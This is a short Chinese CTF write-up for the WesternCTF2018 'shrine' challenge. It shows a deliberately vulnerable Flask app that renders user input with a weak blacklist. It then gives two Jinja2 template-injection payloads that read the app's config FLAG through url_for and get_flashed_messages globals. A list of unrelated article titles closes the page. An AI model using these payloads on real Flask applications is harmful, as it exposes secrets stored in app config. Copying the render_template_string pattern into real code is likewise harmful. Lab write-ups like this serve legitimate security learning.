WesternCTF2018_shrine
2024-10-09 20:01:49
这个想了半天没啥思路,直接查别人的wp,贴地址:https://blog.csdn.net/qq_42812036/article/details/104324923
0x00
开始的页面猛一看乱七八糟,原来查源码会把它排一下版,感觉挺实用,记下来。。。看到flask就差不多能想到python模板注入了。以下是代码:
import flask
import os
app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')
def index():
return open(__file__).read()
@app.route('/shrine/<path:shrine>')
def shrine(shrine):
def safe_jinja(s):
s = s.replace('(', '').replace(')', '')
blacklist = ['config', 'self']
return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
app.run(debug=True)
0x01
这里,等我这两天要学一下这个flask和os。
文章里给了两种解决方法。
0x02
方法一payload:
/shrine/{{url_for.__globals__['current_app'].config['FLAG']}}
方法二payload:
/shrine/{{get_flashed_messages.__globals__['current_app'].config['FLAG']}}
手打加深记忆。
-完-
最新文章
- caffe的python接口学习(4):mnist实例---手写数字识别
- ReactJS学习笔记(三)
- Jquery插件开发精品教程
- Oracle中的数据分页
- Oracle 同时删除多张表
- [转]基于四叉树(QuadTree)的LOD地形实现
- C#利用POST实现杭电oj的AC自动机器人,AC率高达50%~~
- awk 中 FS的用法
- Github 开源:高效好用的对象间属性拷贝工具:升讯威 Mapper( Sheng.Mapper)
- Android视频直播:流媒体服务器搭建
- [WinForm]dataGridView背景色交替
- node-fs文件系统模块
- Linux防火墙基础与编写防火墙规则
- Flex学习笔记--多层菜单按钮
- linux驱动开发第二步 驱动模块传参(module_param函数使用)
- Vakuum开发笔记01 开天辟地
- 【Android UI】Android颜色系大全
- Ubuntu16.04 安装lamp环境
- The Activities of September
- Racket 版本的 24 点实现